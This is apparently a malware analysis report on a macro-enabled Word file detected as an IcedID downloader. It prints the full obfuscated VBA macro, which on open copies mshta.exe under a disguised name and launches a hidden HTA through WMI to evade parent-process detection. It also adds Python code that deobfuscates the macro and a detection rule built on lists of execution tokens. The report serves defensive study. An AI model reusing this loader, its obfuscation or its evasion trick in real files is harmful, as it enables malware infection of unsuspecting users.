Verdict: MALICIOUS
Risk score: 170
Heuristics: 6 findings

Findings
ClamAV: Doc.Downloader.IcedID-87f88705f807f878-9951567-0 [critical] CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Downloader.IcedID-87f88705f807f878-9951567-0
VBA project inside OOXML [medium] OOXML_VBA (3 related findings): Document contains a VBA project; VBA macros present.
CreateObject call [high] OLE_VBA_CREATEOBJ: CreateObject call. Matched line in script:
CreateObject(abtToa).create (aWjxv)
In the extracted source, abtToa is the constant aHVzE2 reversed with the ")" separators removed, which yields the WMI moniker winmgmts:root\cimv2:Win32_Process; the matched line is therefore a Win32_Process.Create call whose command line is built by aWjxv.
VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC: Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
AutoOpen macro [low] OLE_VBA_AUTOOPEN: AutoOpen macro. Matched line in script:
Sub AutoOpen()
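The pairing logic behind the OLE_VBA_PCODE_AUTOEXEC_EXEC finding, and the reason the AutoOpen finding is only rated low on its own, as an added example that is not the analyzer's own code. The token lists are exactly the ones the finding text enumerates; the matcher is a case-insensitive whole-word search over whatever text was recovered from the VBA stream. SAMPLE_EXCERPT is copied from the macro shown in the artifact preview further down (junk comments omitted); the two control snippets are constructed.

```python
"""Minimal re-implementation of the auto-exec + execution-token pairing rule.

Added example, not the analyzer's own code.  It answers the question the
finding text raises: why AutoOpen alone, or CreateObject alone, is not enough.
"""
import re

AUTOEXEC_TOKENS = ("Auto_Open", "AutoOpen", "Document_Open", "Workbook_Open",
                   "Auto_Close", "AutoClose")
EXEC_TOKENS = ("Shell", "CreateObject", "GetObject", "PowerShell", "cmd.exe",
               "URLDownloadToFile", "WinHttp", "XMLHTTP", "ADODB.Stream",
               "ShellExecute", "ExecuteExcel4Macro")


def _matched(stream_text, tokens):
    """Tokens present as whole words.  Identifier characters on either side
    disqualify a hit, so 'MyShell' is not 'Shell' and the 'Shell' inside
    'PowerShell' does not double-count, while '.Shell' or 'Shell(' still hit."""
    hits = []
    for tok in tokens:
        pattern = r"(?<![A-Za-z0-9_])" + re.escape(tok) + r"(?![A-Za-z0-9_])"
        if re.search(pattern, stream_text, re.IGNORECASE):
            hits.append(tok)
    return hits


def pcode_autoexec_exec(stream_text):
    """Return (fires, detail).  Fires only when at least one token from EACH
    class is present; `detail` is what the report's detail line would name."""
    detail = {"autoexec": _matched(stream_text, AUTOEXEC_TOKENS),
              "exec": _matched(stream_text, EXEC_TOKENS)}
    return bool(detail["autoexec"]) and bool(detail["exec"]), detail


# Lines copied from the extracted macro (junk comment lines dropped).
SAMPLE_EXCERPT = (
    "Sub AutoOpen()\n"
    "aGis3U\n"
    "End Sub\n"
    "Sub aGis3U()\n"
    "abtToa = admq0V(ati159(aHVzE2))\n"
    "CreateObject(abtToa).create (aWjxv)\n"
    "End Sub\n"
)

# Constructed controls, not from the sample: one token class each.
ONLY_AUTOEXEC = 'Sub AutoOpen()\n    MsgBox "benign"\nEnd Sub\n'
ONLY_EXEC = 'Sub Helper()\n    Set o = CreateObject("WScript.Shell")\nEnd Sub\n'

if __name__ == "__main__":
    for name, text in (("sample", SAMPLE_EXCERPT),
                       ("only autoexec", ONLY_AUTOEXEC),
                       ("only exec", ONLY_EXEC)):
        print(name, pcode_autoexec_exec(text))
```

When source extraction fails and only p-code is available, the text this runs over is whatever a p-code dumper (for instance pcodedmp) recovers, which is why the rule is deliberately a co-occurrence check rather than anything that needs parseable VBA.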
Embedded URL [info] EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All of the URLs below were found in document text (OOXML body / shared strings). Every one is an XML namespace URI (OOXML/WordprocessingML and Office drawing schema identifiers, plus XMP/RDF metadata namespaces), none of them appears in the macro, and none is a network indicator for this sample.
- http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas
- http://schemas.microsoft.com/office/drawing/2014/chartex
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartex
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartex
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartex
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartex
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartex
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartex
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartex
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartex
- http://schemas.openxmlformats.org/markup-compatibility/2006
- http://schemas.microsoft.com/office/drawing/2016/ink
- http://schemas.microsoft.com/office/drawing/2017/model3d
- http://schemas.openxmlformats.org/officeDocument/2006/relationships
- http://schemas.openxmlformats.org/officeDocument/2006/math
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
- http://schemas.openxmlformats.org/wordprocessingml/2006/main
- http://schemas.microsoft.com/office/word/2010/wordml
- http://schemas.microsoft.com/office/word/2012/wordml
- http://schemas.microsoft.com/office/word/2018/wordml/cex
- http://schemas.microsoft.com/office/word/2016/wordml/cid
- http://schemas.microsoft.com/office/word/2018/wordml
- http://schemas.microsoft.com/office/word/2015/wordml/symex
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroup
- http://schemas.microsoft.com/office/word/2010/wordprocessingInk
- http://schemas.microsoft.com/office/word/2006/wordml
- http://schemas.microsoft.com/office/word/2010/wordprocessingShape
- http://ns.adobe.com/xap/1.0/
- http://www.w3.org/1999/02/22-rdf-syntax-ns#
- http://ns.adobe.com/xap/1.0/mm/
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#
- http://purl.org/dc/elements/1.1/
- http://ns.adobe.com/photoshop/1.0/
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 12996 bytes | 5f5631aa2553e5b771b231a453e4f50fd9af112def85e8550fb2de7ce2c987c4 |
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 53760 bytes | 9a58852f2a0443a7e4055ed1b35d4651daaa17aade044ef540895cdffee65845 |
Preview of macros.bas (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "aEdyq"
Function ati159(aw2aL)
' Oil expand beginners pride clarke batting limbo eddie
' Fairfield vomiting react attempting mortgages havana
' Impel impromptu nebuchadnezzar element bulkhead
' Efficacious
' Html qt
' Ineffable analyze glenn
' Molding markers kde
' Babel omnibus
' Proved
' Nat several ho
' Ping having enigma
amklBH = aw2aL
aIFKnO = Len(amklBH)
For aTuWp = 0 To aIFKnO - 1
' Camcorders demoralization lovers
' Wool scripting breeds
' Invasion turquoise
' Larva
' Play liabilities suddenly acceleration
' Possessive forecastle toyota expired static statutory
' Palaver dash dazzle
' Fabric alumina dining deferred various
' Mourner beet dependent upland
' Profanation behest california welfare
' J gets
' Ahoy spot counterfeit southampton
ab3HB = ab3HB & Mid(amklBH, (aIFKnO - aTuWp), 1)
Next aTuWp
' Brine prisoner
ati159 = ab3HB
End Function
Public Function admq0V(aRsqgz)
admq0V = Replace(aRsqgz, aso8D, "")
' Dozens muslim hazardous specter unceasing
' Illusory italia positioning inspection distinguished
' Prohibit denizen llc
' Rail kurt bald
' Midi beaver trash
' Joiner subsidiary
' Bumper
' Desperado
' Organizations seasick tests
' Lesions shannon
' Melee gently
End Function
Sub AutoOpen()
' Engine hamilton
' Inspired heinous recondite
' Florida principality cowslip ups
' Floyd ulster aspen transmission
' Arcadian electron spam auditory pmid
' Federation
' Consonant wide
' Byte journalist
' Enclose nomadic give coolie
' Anniversary liberate
' Sustenance kerosene broken-down
aGis3U
End Sub
Attribute VB_Name = "aCiBE5"
Public Const aHVzE2 As String = "sse)cor)P_2)3ni)W:2)vmi)c\t)oor):st)mgm)niw"
Public Const aso8D As String = ")"
Public Const auQG07 As Integer = 2256 - 2243
Function apdSL6()
' Cherubs
End Function
Sub aG1tsp(azxyCG)
' Protected weight guild
' Polished andrea denunciation eyebrow environment disappointed
' Thomas indian licentiousness tinker impressive hard
' Frog dsl pulled anna schema
' Walt sensitive
' Stucco convoy unattainable benchmark
' Generic sp excited
' End soft away spike
' Dee libyan
' Adroit observatory
' Patterns puncture leash fifty-four reel
' Species saturn
' Leonard prospective
' Erotic
' Edification patricia cuff funding
' Penitence gis there southwark hat models
' Blues stockholm uni slanderous
' Connections lather malachi pad pulse navigation
' Element does hq criticized
' Jane dogged or dot
' Contains meaningless stinging james
' Possess sharp millennium hackneyed
' Ennui provocative
' Acceptation egg jm
' Redhead paste demolition qld snap
' Infirm trace
' Tonight macedonians beleaguered forsworn
' Word muffin decisions uk mas joke
' Feed screen
' Sponsors daily
' Original cuckold rhythm
' Demarcation picking hazardous pre- resumes core
' Tottering cleaner
' Cuirass oxford unauthorized pj
' Monopolize fingering
End Sub
Function adIae(ay3Te)
' Advertiser housewife lucknow influence todd
' Refine immoderate orpheus chronology
' Defraud actually mel friends
' Pegasus bracket mainstream structure michel plume awe-struck animates
' Logos communist accomplished
' Poll grip diminutive devon
' Sexcam issued households restrict monaco
' Unsaid acids
' Comparing mongolian elective muslim solutions
' Ant quarterly vendors pear
' Helicopter ewe masonry sameness
adIae = ActiveDocument.BuiltInDocumentProperties(ay3Te)
End Function
Public Sub aJGw3()
If 1600 / 25 < 150 Then
Call aYoDX
End If
End Sub
Public Sub a6B0P()
If 1600 / 25 < 150 Then
Call alQ8C
End If
End Sub
Attribute VB_Name = "aG9DJS"
Public Function amB0qZ(awnJX2, aDw0bE)
' Stabbing left provides
' Graphs
' Resulting saying js forest
' Orbit finals comments anyway
' Fallacious descry joins cannibalism
' Convinces networks freelance
' Destroyed bellow sirrah savannah
' Ooze interdict rectify hackers shapes
' Refrigerator
' Brainless locking angelina spelling
' Dispersing dogmatism
' Construe peaceful forums
' Venom handcuffs amaze
' Delayed
' Orgy cabinets pound wizard appropriately
' Fittest entity yeh telescope
' Suet man sedge universe
' Stuffy enrolled
' Hop col fiftieth relax
' Four jd entities porpoise logs
' Decisions tic flirtation
FileNumber = FreeFile
Open awnJX2 For Output As #FileNumber
' Peerage boring wayne trackbacks taxation
' Malawi
' Valuables fevered
' Tongue-tied israeli staccato
' Villa ringleader recurring belittle
' Spectrum demonstrated burden rick gave
' Reduced codes apocryphal sponsor treasurer
' Knightly corruption lack
' Healing departure gold nonsensical
' Bye shoal slow
Print #FileNumber, aDw0bE
Close #FileNumber
End Function
Sub aClJqU(anSvbk, adX9q)
' Discerning quail temperature
' Victorian catacombs square petition apollo
' Son comfort
' Obligations fir
FileCopy anSvbk, adX9q
End Sub
Function abH61(an1Ja)
abH61 = an1Ja
End Function
Attribute VB_Name = "aBM6Pm"
Sub aGis3U()
aJGw3
a6B0P
' Parenting mosque
' Surgeons wines installed
' Authorized expeditious gale approximate
' Alarm seville
' Recordings ostentatious safer marvin hydra
' Differently archaic abbreviated oecd required cocoa
' Unaccompanied graphics sleight
' Traditions pizza early noisome reasons runs commission
' Introduces provider microwave publishing ser
' Recede trigonometry
' Aggressor sr assault mined
' Yuan bandit inequalities
' Fervid Word unfettered
' Vim pore
' Keg bumper animated fag mountains
' Hist breaking
' Centurion thunderstruck evaporate inimitable heb. tiara guardian
' Estate throttle optimization payments
' Perfectly millions economize any
' Transform injuries clan hypothetical
' Junk
' Inflation projected senior baroness
' Umbrellas homepage ta incidentally
' Portent whilst sop jumps
' Visitor roads existing traveling gave
' Warwickshire ira chamois graduation
' Moderator loosen
' Timorous murder estimated
' Misgivings postmaster
' Unix muslims concentrations msie dignify
' Mildew edt sterling
' Prow insects
' Norma debatable reported discharging agree reading biography
abtToa = admq0V(ati159(aHVzE2))
CreateObject(abtToa).create (aWjxv)
End Sub
Attribute VB_Name = "aQlvJ"
Function aBt82()
aBt82 = VBA.Split(ati159("l)m)t)h).)s)m)\)c)i)l)b)u)p)\)s)r)e)s)u)\):)C)|)m)o)c).)s)m)\)c)i)l)b)u)p)\)s)r)e)s)u)\):)C)|)e)x)e).)a)t)h)s)m)\)2)3)m)e)t)s)y)s)\)s)w)o)d)n)i)w)\):)c)|)o)t)o)m) )o)l)l)e)h)"), "|")
End Function
Function aoiuE(a5Ji6A)
aqd7n = aBt82()
' Mastiff itch fisher frontpage
' Attorneys
' Dump trample ebooks introduces steak
' Ranking continued omnipotent
' Seal bus
' Vocal tramadol
' Interracial ashley
' Variation narrate scion
' Contemn epidemics adduced
' Wrongdoing drover glasgow
' Memento information que such
' Himalayas annoying spell furlough perpetuate ungodly
' Macedon come welled ag determining
' Norm surplus portions
' Gaseous concomitant stunt
' Floral emulation
' Fraternal blacks pharmacies
' Termination belly
' Croatia attorneys greensboro
' Uw bbw insider coffer
' Sociology ukraine handmade
Select Case a5Ji6A
' Mason lisa won trusted ps
' Impious qualify
' Literally singing greenish raises demi eva mr
' Nullify tee largesse
' Fusillade apostate applicable
' Hosea
' Incubus lothario unprecedented density tributary capriciously
' Lengthy recurring statewide assumed
' Mystery telephony beyond
' Confidential ruse
' Pestilent screenshots mastiff non-
' Finishing determines bradford renew
Case 0:
' Governmental weeps thanks griffith
' Indirect trout flounder craven thu
' Alderman stuffy concomitant
' Gary clarke buttonhole
' Foolscap personnel threefold
' Lou documents
' Glossary dynamite
' Ones global fustian
' Flyer
' Lecture counsellor
' Ethnic russia limitations particularly tart undertake sustenance
aoiuE = aqd7n(1)
' Topic conjuncture find scored
' Insatiable prosy
' Advances tripadvisor moments complete
' Blasphemy excitement
' Beleaguered saved instantaneous historical thirty-one
' Compression chaplet syntax fact
' Diffs perth
' Relentless pyrites mai luster tv
' Wolfish peru sculpture addicted fear
' Got forth specialties paddy such
Case 1:
aoiuE = aqd7n(2)
' Bias effusive receiving rolls
' Athletics
' Mechanisms deemed
' Unveil da
' Stewart surmise
' Betrayal tenaciously
' Forge chequered hawser exemption
' Alleged ungracious loading om
' Ana urges grannie
' Holly dining discharging ranks
' Trinity
Case 2:
aoiuE = aqd7n(3)
End Select
End Function
Sub alQ8C()
aMUEc = a7PjYe(aoiuE(2))
amB0qZ aMUEc, anD3Wb(adIae("comments"))
End Sub
Attribute VB_Name = "akNhYX"
Function aMuJH(apa7E)
' Drawing trend macaroni
' Romanticism
' Oral beetles plug
' Chat enhancements depreciate
' Minerals impacts
' Boa crabs adjusted craps scowl
' Peripheral postcards
' Door freckled
' Coaching steam seraph
' Maya excel hopping ammonia emphasize
aMuJH = admq0V(apa7E)
End Function
Function awrPp(aFwCiR)
awrPp = (admq0V(aFwCiR))
End Function
Function a7PjYe(aQYNDG)
a7PjYe = (admq0V(aQYNDG))
End Function
Function aWjxv()
ag5tUp = awrPp(aoiuE(1))
alVXY = a7PjYe(aoiuE(2))
aWjxv = ag5tUp & " " & alVXY
End Function
Sub aYoDX()
ay3zi = aMuJH(aoiuE(0))
ag5tUp = awrPp(aoiuE(1))
aClJqU ay3zi, ag5tUp
End Sub
Function aYj8w(aF3xO)
aYj8w = aF3xO + -461 + 487
End Function
Function arCWmU(aSxHC)
If aSxHC = 0 Then
arCWmU = 15793 / 15793
' Favorites paraffin meal childbirth cultural
' Condescending gamble closure womanish montana dastardly
' Sometimes pied smith
' Taste yet con
ElseIf aSxHC = 5 Then
arCWmU = 239 - 142
Else
arCWmU = 1035 - 11
End If
End Function
Function ax87U(aF3xO, aHv3C)
ax87U = aF3xO - aHv3C
End Function
Function aniW5(aF3xO)
aniW5 = Chr(aF3xO)
' Endearment wildlife
' Unconcern
' Memories sark powerseller
' Mosquito indie
' Premise sepulture benefice meekness
' Dislocation
' Other
' Band jones
' Dauphin sonic suffered libyan
' Loading twenty-sixth pacify
' Flue weakling puberty turquoise
End Function
Attribute VB_Name = "afdrn"
Function anD3Wb(aQv5W) As String
Dim aHLfa As Long
Dim aqD6e As Integer
Dim a54Xg As Integer
For aHLfa = 1 To VBA.Len(aQv5W) Step 1
a54Xg = 0
' Itunes persons faultless
akxiQ = Mid(aQv5W, aHLfa, 1)
' Summit royalty
' Slit bed phantom affected
' Outlandish facade pillow stuffy inorganic
' Generic emulation tannin determine explicitly
' Uri behalf
' Interracial clicks quarterly
' Siberia
' Macromedia furthermore processor cursor authentication games
' Thesis rotary perspectives kids deutsche
' Consequence
aqD6e = Asc(akxiQ)
' Theme federal ungodly christians pincers perl
' Sacred dais qui revised barely chairs
' Momentum demesne agape
' Mercedes predatory repeal cookie illustration
' Aberdeen torpid
' Ring editions marion utc
' Surge
' Knee-deep flight husband management industries
' Preposition bytes pursuant
' Former circles variability
' Britney vita cooked
' Photographic pda article goblin specially
' Cam decoy cameo cellular banging carnal
' Bleed petroleum
' Heyday livestock
' Rose humans premonition census reasoning gather
' Augur crack rugs laboratories halifax
' Systematic nylon bleached parvenu horus surreptitiously
' Assignment any
' Smithy pawn childrens sammy goal ec
' Displays stifle platinum from casual rejoinder
' Tunisia
' Discovers choral share
' Infusion
' Malawi moraine vulture
' Refund mirror cowper
' Soliloquy holocaust fatherless
' Al dislodge icons
' Aspirant unravel psychiatry
' Passing
' Augury
' Hundreds escape adorer z homeless
' Linking
' Windsor i merchant petiole
' Phpbb mrs chary marcus
' Micah richard revolve
If (aqD6e > 64 And aqD6e < 91) Or (aqD6e > 96 And aqD6e < 123) Then
' Finale atop responsibilities depth
' Devon vietnam worry
' Olden communist
' Nausea thesaurus simpleton applied
' Counterbalance kerry
' Poet acquirement tether cab ao
' Fx municipality
' Alicia terrorist ep profusely anent own
' Supercilious
' Angelus
' Fixtures coldest abrogated emotions
a54Xg = auQG07
aqD6e = ax87U(aqD6e, a54Xg)
' Sap global
If aqD6e < arCWmU(5) And aqD6e > 83 Then
aqD6e = aYj8w(aqD6e)
ElseIf aqD6e < 63 + 2 Then
aqD6e = aYj8w(aqD6e)
End If
End If
azKFti = aniW5(aqD6e)
' Mostly external wales
' Mort exemption aqua
' Expense dropped bdsm token uterus discordant young
' Inconspicuous heat considering ap combatant
' Proudly jockey schema bhutan voyager
' Sparrow earth
' Theoretical seacoast trade manifesto slouch
' Rig burst dover
' Delicious
' Gst
' Hooked subvert mesh beam
Mid$(aQv5W, aHLfa, 1) = abH61(azKFti)
Next
anD3Wb = aQv5W
End Function
End of the macros.bas preview. The second carved artifact, vbaProject_00.bin, is the raw OOXML VBA project (word/vbaProject.bin, 53760 bytes, SHA-256 9a58852f2a0443a7e4055ed1b35d4651daaa17aade044ef540895cdffee65845) from which olevba decoded the macros.bas source above.
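Added example, not part of the analyzer output or of the sample: a Python re-implementation of the three string transformations the extracted macro relies on (string reversal in ati159, ")" stripping in admq0V, and the letter shift in anD3Wb), fed with the constants copied verbatim from modules aCiBE5 and aQlvJ, so the execution chain can be read off without opening the document. Function names here are ours; the VBA routine each mirrors is named in a comment. The one input not on this page is the document's built-in "Comments" property, which the macro decodes into the HTA file; the report does not include it, so the text passed to decode_comments is a constructed stand-in.

```python
"""Deobfuscation of the string hiding used in the extracted macro.

Added example, not code from the report or the sample.  Each helper mirrors
one VBA routine from the preview above (named beside it) and runs on the
constants copied verbatim from the macro.
"""

SEP = ")"                 # aso8D: the junk separator the macro strips out
SHIFT = 2256 - 2243       # auQG07: 13
WRAP = -461 + 487         # what aYj8w adds back: 26

# Copied from the macro.  Raw strings: the backslashes are literal path separators.
WMI_MONIKER_OBF = r"sse)cor)P_2)3ni)W:2)vmi)c\t)oor):st)mgm)niw"     # aHVzE2
PATH_TABLE_OBF = (                                                   # literal inside aBt82
    r"l)m)t)h).)s)m)\)c)i)l)b)u)p)\)s)r)e)s)u)\):)C)|)m)o)c).)s)m)\)c)i)l)b)u)p)\)"
    r"s)r)e)s)u)\):)C)|)e)x)e).)a)t)h)s)m)\)2)3)m)e)t)s)y)s)\)s)w)o)d)n)i)w)\):)c)"
    r"|)o)t)o)m) )o)l)l)e)h)"
)


def reverse(s):                       # ati159
    return s[::-1]


def strip_sep(s):                     # admq0V (aMuJH / awrPp / a7PjYe just wrap it)
    return s.replace(SEP, "")


def wmi_moniker():                    # abtToa = admq0V(ati159(aHVzE2))
    return strip_sep(reverse(WMI_MONIKER_OBF))


def path_table():                     # aBt82, plus the strip_sep every caller applies
    return [strip_sep(p) for p in reverse(PATH_TABLE_OBF).split("|")]


def decode_comments(text):            # anD3Wb
    """Letters only: subtract 13, add 26 back when that leaves the alphabet.
    Everything else passes through unchanged.  That is plain ROT13."""
    out = []
    for ch in text:
        a = ord(ch)
        if 65 <= a <= 90 or 97 <= a <= 122:
            a -= SHIFT
            # In the original: arCWmU(5) evaluates to 97 and 63 + 2 to 65.
            if 83 < a < 97 or a < 65:
                a += WRAP
        out.append(chr(a))
    return "".join(out)


def execution_chain(comments_property):
    """What AutoOpen -> aGis3U does, with every string resolved.
    aoiuE(n) returns table entry n + 1; entry 0 ("hello moto") is never used,
    and the 'If 1600 / 25 < 150' guards in aJGw3 / a6B0P are always true."""
    table = path_table()
    src, dst, hta = table[1], table[2], table[3]
    return {
        "1_filecopy": (src, dst),                                   # aYoDX: FileCopy
        "2_write_hta": (hta, decode_comments(comments_property)),   # alQ8C: Print #
        "3_wmi_create": (wmi_moniker(), f"{dst} {hta}"),            # aGis3U: .Create
    }


if __name__ == "__main__":
    # Constructed stand-in for the Comments property; the real one is not on the page.
    stand_in = "Pbafgehpgrq fgnaq-va, abg gur erny cnlybnq"
    for step, value in execution_chain(stand_in).items():
        print(step, value)
```

Reading the result: AutoOpen calls aGis3U, which copies c:\windows\system32\mshta.exe to C:\users\public\ms.com, writes the ROT13-decoded Comments property to C:\users\public\ms.html, and then runs "C:\users\public\ms.com C:\users\public\ms.html" through Win32_Process.Create. Two consequences for detection: the process is created by WMI, so its parent is WmiPrvSE.exe rather than WINWORD.EXE and Office-spawns-mshta parent/child rules will not see it; and the LOLBin runs under a non-.exe name from C:\users\public, so a copy of mshta.exe appearing in a user-writable directory is the more robust indicator.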